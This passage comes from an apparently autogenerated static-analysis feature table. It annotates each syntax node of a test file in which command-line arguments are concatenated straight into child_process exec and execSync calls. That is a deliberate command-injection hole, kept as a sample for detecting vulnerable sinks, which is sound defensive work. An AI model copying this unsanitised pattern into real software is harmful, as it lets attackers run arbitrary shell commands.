args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | exceptional return of cp.exec ... rgs[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | exceptional return of cp.exec ... rgs[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:5:12:12 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:5:12:12 | execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:5:12:12 | execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:5:12:12 | execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:5:12:12 | execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:22 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:22 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:22 | "cmd.sh " | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:22 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:22 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:22 | "cmd.sh " | stringConcatenatedWith | -endpoint- args.0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:29 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:29 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:29 | args | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:29 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:29 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:32 | args[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:32 | args[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:32 | args[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:32 | args[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:32 | args[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:26:12:32 | args[0] | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:31:12:31 | 0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:31:12:31 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:31:12:31 | 0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:31:12:31 | 0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:31:12:31 | 0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:14 | fewerArgs | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:14 | fewerArgs | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:14 | fewerArgs | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:14 | fewerArgs | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:14 | fewerArgs | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerAr ... lice(1) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerAr ... lice(1) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerAr ... lice(1) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerAr ... lice(1) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerAr ... lice(1) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerArgs | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerArgs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerArgs | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerArgs | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:6:14:30 | fewerArgs | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:21 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:21 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:21 | args | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:21 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:21 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:27 | args.slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:27 | args.slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:27 | args.slice | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:27 | args.slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:27 | args.slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | args.slice(1) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | args.slice(1) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | args.slice(1) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | args.slice(1) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | args.slice(1) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | exceptional return of args.slice(1) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | exceptional return of args.slice(1) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | exceptional return of args.slice(1) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | exceptional return of args.slice(1) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | exceptional return of args.slice(1) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:23:14:27 | slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:23:14:27 | slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:23:14:27 | slice | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:23:14:27 | slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:23:14:27 | slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:29:14:29 | 1 | CalleeFlexibleAccessPath | args.slice | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:29:14:29 | 1 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:29:14:29 | 1 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:29:14:29 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:29:14:29 | 1 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:29:14:29 | 1 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:29:14:29 | 1 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:29:14:29 | 1 | receiverName | args | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:12 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:12 | cp.execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:12 | cp.execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:12 | cp.execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:12 | cp.execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | cp.exec ... rgs[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | cp.exec ... rgs[0]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | cp.exec ... rgs[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | cp.exec ... rgs[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | cp.exec ... rgs[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | exceptional return of cp.exec ... rgs[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | exceptional return of cp.exec ... rgs[0]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | exceptional return of cp.exec ... rgs[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | exceptional return of cp.exec ... rgs[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | exceptional return of cp.exec ... rgs[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:5:15:12 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:5:15:12 | execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:5:15:12 | execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:5:15:12 | execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:5:15:12 | execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:22 | fewerArgs | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:22 | fewerArgs | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:22 | fewerArgs | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:22 | fewerArgs | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:22 | fewerArgs | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | calleeImports | child_process | +| 